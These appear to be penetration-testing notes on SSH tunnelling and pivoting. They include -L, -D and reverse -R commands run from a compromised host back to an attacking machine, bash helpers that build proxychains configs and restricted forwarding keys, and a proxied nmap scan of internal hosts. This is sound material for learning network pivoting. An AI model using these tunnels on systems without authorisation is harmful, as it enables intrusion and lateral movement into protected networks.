
SSH Tunnelling / Port Forwarding

Forward Connections

Creating a forward (or "local") SSH tunnel can be done from the attacking box when we have SSH access to the target.

Port forwarding: the -L switch, which links a port on our Local machine to a host and port that the SSH server can reach.

  • For example, if we had SSH access to 172.16.0.5 and there was a webserver running on 172.16.0.10, we could link local port 8000 to port 80 on 172.16.0.10 (the -L command is listed with the other examples below).

You can then browse the website on 172.16.0.10 (through 172.16.0.5) by pointing a browser on the attacking machine at localhost:8000.

Good practice: use a high, unused port for the local end so it does not collide with anything already listening.

Creating a proxy: the -D switch

  • For example, -D 1337 opens port 1337 on the attacking box as a SOCKS proxy; anything sent to it is relayed through the SSH server into the protected network.

This is useful when combined with a tool such as proxychains, which points other programs at that SOCKS port. The -D command is listed with the other examples below.
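As an added example (not part of the original page), the following bash helpers wrap the two tunnel types above: they print the -L and -D invocations, refuse privileged local ports in line with the good-practice note, write a proxychains configuration for the SOCKS port, and poll until the local port is really listening, since ssh -f returns before the listener is necessarily up. The account, hosts, ports and config path in the usage comment are placeholders.

```bash
#!/usr/bin/env bash
# Added example: helpers for the forward (-L) and dynamic (-D) SSH tunnels.
# Assumed placeholders: USER@JUMP (account on the SSH server), ports, config path.

# True only for an unprivileged, valid TCP port (1025-65535).
is_high_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -gt 1024 ] && [ "$1" -le 65535 ]
}

# Print the ssh command for a local forward:
# LOCAL_PORT on this box -> REMOTE_HOST:REMOTE_PORT as reached from the SSH server.
forward_cmd() {
    local lport="$1" rhost="$2" rport="$3" jump="$4"
    is_high_port "$lport" || { echo "use an unprivileged local port (1025-65535), got '$lport'" >&2; return 1; }
    printf 'ssh -fN -L %s:%s:%s %s\n' "$lport" "$rhost" "$rport" "$jump"
}

# Print the ssh command for a SOCKS proxy bound to 127.0.0.1:SOCKS_PORT only
# (binding explicitly to loopback keeps the proxy off any other interface).
proxy_cmd() {
    local sport="$1" jump="$2"
    is_high_port "$sport" || { echo "use an unprivileged local port (1025-65535), got '$sport'" >&2; return 1; }
    printf 'ssh -fN -D 127.0.0.1:%s %s\n' "$sport" "$jump"
}

# Emit a minimal proxychains config for that SOCKS port. proxy_dns sends name
# lookups through the tunnel too, so internal hostnames resolve on the far side
# instead of leaking to the local resolver.
proxychains_conf() {
    local sport="$1"
    cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $sport
EOF
}

# Poll until something is listening on local PORT (checked with ss(8)).
# Returns 1 after TRIES seconds without a listener.
wait_for_listener() {
    local port="$1" tries="${2:-10}"
    while [ "$tries" -gt 0 ]; do
        if ss -ltn 2>/dev/null | awk -v p=":$port" '$4 ~ p"$" { f=1 } END { exit !f }'; then
            return 0
        fi
        sleep 1
        tries=$((tries - 1))
    done
    return 1
}

# Usage (placeholders; nothing below runs when the file is only sourced):
#   eval "$(proxy_cmd 1337 user@172.16.0.5)" && wait_for_listener 1337 \
#     && proxychains_conf 1337 > /tmp/pc.conf \
#     && proxychains -f /tmp/pc.conf nmap -sT -Pn -p 80,445 172.16.0.10
```

Run the tunnel command with eval (or paste it), then wait_for_listener before starting proxychains; a tool launched before the SOCKS port is up fails with a connection-refused error that looks like a dead target.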


Reverse Connections

Reverse connections are also possible with the SSH client, and may be preferable when you have a shell on the compromised server but no SSH access to it.

They are, however, riskier: the target must authenticate to your attacking machine, either with credentials or, preferably, with a dedicated key that can do nothing but forward ports.

The forward tunnel and SOCKS proxy commands from the two sections above (USERNAME@SSH_HOST stands for the account and server you already have SSH access to, 172.16.0.5 in the example):

# Forward tunnel: local port 8000 -> port 80 on the internal web server (here 132.227.89.21; substitute the host you want to reach), via the SSH server
ssh -L 8000:132.227.89.21:80 USERNAME@SSH_HOST -fN

-f sends ssh to the background once the connection is established
-N tells SSH not to run a remote command, only to set up the connection

# SOCKS proxy on local port 1337, for use with proxychains
ssh -D 1337 USERNAME@SSH_HOST -fN

Before we can make a reverse connection safely, there are a few steps to take:
# 1. Generate a new, dedicated SSH key pair on the attacking machine and store it somewhere safe
ssh-keygen

# 2. Copy the contents of the public key (the .pub file), then edit ~/.ssh/authorized_keys on your own attacking machine

# 3. On a new line, type the following options, then paste the public key in place of ssh-public-key (all on one line).
#    no-pty denies an interactive shell, the fixed command replaces anything the client asks to run,
#    and agent/X11 forwarding are switched off, so the key is good for tunnels and nothing else
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty ssh-public-key

# 4. Start the SSH service on the attacking machine (the unit is named sshd on some distributions)
sudo systemctl start ssh

# 5. Transfer the private key to the target server. Anyone who reads it there can log in to your box with it,
#    which is why the restrictions in step 3 matter; remove the line from authorized_keys when you are done

# 6. With the key transferred, connect back with a reverse port forward (run on the target server).
#    With -R the first port opens on the ATTACKING machine; connections to it are relayed by the target to TARGET_IP:TARGET_PORT
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

# or, with OpenSSH 7.6 or newer: a single port after -R opens a reverse SOCKS proxy on the attacking machine,
# so proxychains pointed at 127.0.0.1:1337 there sends traffic out through the target
ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN
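The six steps above as one bash script, added here as an example and not taken from the original page. It runs on the attacking machine: it generates a dedicated ed25519 key if none exists, builds the restricted authorized_keys line from the .pub file (dropping the key comment so a stray comment cannot break the line), installs it idempotently with sane permissions, starts sshd, and prints the -R commands to paste on the target. The key path, account, ATTACKING_IP and the target-side addresses in the usage comment are placeholders.

```bash
#!/usr/bin/env bash
# Added example: reverse-forward setup on the attacking machine.
# Assumed placeholders: key path, account name, ATTACKING_IP, TARGET_IP:TARGET_PORT.

# Build the authorized_keys line for a forwarding-only key.
# Argument: path to a .pub file. Only the key type and blob are kept.
# On OpenSSH 7.2 or later, "restrict,port-forwarding" has the same effect
# (restrict disables everything, port-forwarding re-enables only that).
restricted_authorized_line() {
    local pub="$1" ktype kblob rest
    read -r ktype kblob rest < "$pub" || return 1
    case "$ktype" in
        ssh-ed25519|ssh-rsa|ecdsa-sha2-*|sk-*) ;;
        *) echo "unexpected key type: $ktype" >&2; return 1 ;;
    esac
    printf 'command="echo %s",no-agent-forwarding,no-x11-forwarding,no-pty %s %s\n' \
        "'This account can only be used for port forwarding'" "$ktype" "$kblob"
}

# Steps 1-4: create the key if needed, append the restricted line once, start sshd.
install_forwarding_key() {
    local key="$1" auth="${2:-$HOME/.ssh/authorized_keys}" line
    [ -f "$key" ] || ssh-keygen -t ed25519 -N '' -C 'reverse-forward-only' -f "$key" >/dev/null
    line="$(restricted_authorized_line "$key.pub")" || return 1
    mkdir -p "$(dirname "$auth")" && chmod 700 "$(dirname "$auth")"
    touch "$auth" && chmod 600 "$auth"
    grep -qxF "$line" "$auth" || printf '%s\n' "$line" >> "$auth"
    # Debian-family unit is ssh, RHEL-family is sshd
    sudo systemctl start ssh 2>/dev/null || sudo systemctl start sshd
}

# Step 6, classic form: the command to run ON THE TARGET. The first -R port
# opens on the attacking machine; the target relays it to TARGET_IP:TARGET_PORT.
reverse_forward_cmd() {
    local lport="$1" tip="$2" tport="$3" user="$4" aip="$5" keyfile="$6"
    printf 'ssh -fN -i %s -R %s:%s:%s %s@%s\n' "$keyfile" "$lport" "$tip" "$tport" "$user" "$aip"
}

# Step 6, OpenSSH 7.6+ form: a bare port after -R gives a reverse SOCKS proxy
# on the attacking machine.
reverse_socks_cmd() {
    local sport="$1" user="$2" aip="$3" keyfile="$4"
    printf 'ssh -fN -i %s -R %s %s@%s\n' "$keyfile" "$sport" "$user" "$aip"
}

# Usage on the attacking machine (placeholders; not run when the file is sourced):
#   install_forwarding_key ~/.ssh/fwd_key
#   # step 5: move ~/.ssh/fwd_key to the target over the shell you already have, e.g. to /tmp/k
#   reverse_forward_cmd 8000 172.16.0.10 80 "$USER" 10.10.14.5 /tmp/k   # paste the output on the target
#   reverse_socks_cmd 1337 "$USER" 10.10.14.5 /tmp/k
# Afterwards delete the line from ~/.ssh/authorized_keys and the key from the target.
```

The private key on the target is the part that deserves attention: it is a credential for your own machine, so the fixed command and no-pty in the authorized_keys line are what keep a defender (or another attacker) who finds it from getting a shell on your box.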
# Connect on a non-default port and enable an extra key-exchange algorithm the server insists on (e.g. an old server that only offers legacy kex)
ssh -p PORT -oKexAlgorithms=+<algo> USERNAME@HOST

# Skip the host-key prompt. This also removes the protection against a machine-in-the-middle, so only do it in a throwaway lab
ssh -o StrictHostKeyChecking=no -p PORT USERNAME@HOST

# Forward a local port to a service on the remote host that listens on loopback only (reachable as 127.0.0.1 from the server itself)
ssh -i id_rsa -L LOCAL_PORT:127.0.0.1:REMOTE_PORT USERNAME@HOST

# Recover the public key from a private key, in the OpenSSH format authorized_keys expects
ssh-keygen -y -f KEYFILE
# (-e instead exports the key in RFC4716, PKCS8 or PEM form, selected with -m, which authorized_keys does not accept)